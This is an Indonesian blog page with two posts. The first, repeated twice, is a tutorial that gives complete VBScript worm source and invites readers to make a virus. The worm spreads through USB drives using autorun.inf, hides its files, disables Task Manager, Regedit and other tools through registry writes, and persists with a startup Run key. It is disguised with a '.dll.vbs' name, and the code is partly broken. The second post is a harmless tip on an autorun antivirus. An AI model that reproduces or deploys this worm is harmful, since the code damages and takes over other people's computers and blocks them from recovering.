Statistics

Blog

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Sep 13, 2009

Buat Virus Dengan Notepad (new)

0 comments
 
 
Mo buat virus..???
gampang kok....
Silahkan ketikkan kode script di bawah ini pada aplikasi Notepad..

//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus//
on error resume next

//Dim kata-kata berikut ini//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information//
isi = [autorun] & vbcrlf & shellexecute=wscript.exe bLaCk_eNgInE.dll.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

//Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 39
//Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
//Cek Drive//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then

//Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\//
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs ,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes = 39

//Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)//
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next

//Manipulasi Registry//

set qalby = createobject(WScript.Shell)

//Manip - Ubah Title Internet Explorer menjadi bLaCk_eNgInE//
kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY

//Manip Set agar file hidden tidak ditampilkan di Explorer//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\Advanced\Hidden, 0, REG_DWORD

//Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFind, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFolderOptions, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoRun, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableRegistryTools, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableTaskMgr, 1, REG_DWORD

//Manip Disable klik kanan//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoViewContextMenu, 1, REG_DWORD

//Manip - Munculkan Pesan Setiap Windows Startup//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Winlogon\LegalNoticeCaption, Worm Qalby. Variant from Qalby, dont panic all data are safe.

//Manip Aktif setiap Windows Startup//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs

//Manip Ubah RegisteredOwner dan Organization//
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Qalby

//Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
Akhir dari Kode


Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All Files (*.*). Simpan dengan nama : m0t0rku.dll.vbs. Sebenarnya gak usah pake .dll juga gak apa-apa.
Soalnya ini hanya usaha agar tidak mencurigakan aja...
Membuat Virus deangan NotepadJan 21, '08 11:21 AM
for everyone
Mo buat virus..???
gampang kok....
Silahkan ketikkan kode script di bawah ini pada aplikasi Notepad..

//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus//
on error resume next

//Dim kata-kata berikut ini//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information//
isi = [autorun] & vbcrlf & shellexecute=wscript.exe bLaCk_eNgInE.dll.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

//Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 39
//Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
//Cek Drive//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then

//Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\//
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs ,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes = 39

//Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)//
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next

//Manipulasi Registry//

set qalby = createobject(WScript.Shell)

//Manip - Ubah Title Internet Explorer menjadi bLaCk_eNgInE//
kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY

//Manip Set agar file hidden tidak ditampilkan di Explorer//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\Advanced\Hidden, 0, REG_DWORD

//Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFind, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFolderOptions, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoRun, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableRegistryTools, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableTaskMgr, 1, REG_DWORD

//Manip Disable klik kanan//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoViewContextMenu, 1, REG_DWORD

//Manip - Munculkan Pesan Setiap Windows Startup//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Winlogon\LegalNoticeCaption, Worm Qalby. Variant from Qalby, dont panic all data are safe.

//Manip Aktif setiap Windows Startup//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs

//Manip Ubah RegisteredOwner dan Organization//
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Qalby

//Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
Akhir dari Kode


Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All Files (*.*). Simpan dengan nama : m0t0rku.dll.vbs. Sebenarnya gak usah pake .dll juga gak apa-apa.
Soalnya ini hanya usaha agar tidak mencurigakan aja...
Read more

Jan 17, 2009

Bikin AutoRun AV di Flash Disk Kita

0 comments
Alat & bahan :

————–
software AV yang berukuran kecil (banyak di internet,,goggling aj..)
contoh: PCMAV,ANSAV,SMADAV dll..(tapi Aibi lebih sering pake PCMAV..abiz ukurannya
kecil banget n’familiar buat semua orang…)

Langkah-langkah:

-----—————------

1.ketik di notepad mantera berikut:

[AutoRun]
open=namaantivirus.exe
shellexecute=namaantivirus.exe
shell\Harap Scan Virusnya!!!\command=namaantivirus.exe
shell=Harap Scan Virusnya!!!

2.trus save dengan nama “autorun.inf”(gak pake tanda kutip) di flashdisk kita
sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!!
(NB:kalo ngopy file autorun n’ antivirusnya jangan di dalam folder)

Oke!!! jadi thow bro!!!!!

kalo mau scan virus tinggal double click aja tuh drive flashdisk kita!!
kalo kita klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata
AUTOPLAY.
Scan Dulu Virusnya!!!

kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script…!

shell\kata-kata_anda\command=namaantivirus.exe
shell=kata-kata_anda

3.trus gimana cara buka flashdisknya nih???


gak mungkin lah gak pada tau…tinggal klik kanan aja trus cari open…!
ngak bagus ya kalo di dalam flashdisk kita ada keliatan nama file AUTORUN n’antivirusnya…
ngerusak pemandangan gitu loh….

kalo gitu tinggal kita ubah aja attributnya jadi super hidden…

caranya…???

/media/TDY296/TIPS N TRIK/install printer di Ubuntu.txt

buka RUN dari start menu
terus ketik cmd
masuk ke dalam drive flashdisk (biasanya drive f:)
udah gitu ya kita tulis commandnya

f:\>attrib +h +s namaantivirus.exe (buat hidden antivirusnya)
f:\>attrib +h +s autorun.inf (buat hidden file autorun)

..:SELAMAT MENCOBA:..

Jangan lupa komen yak........
Read more

Design by fr00ty company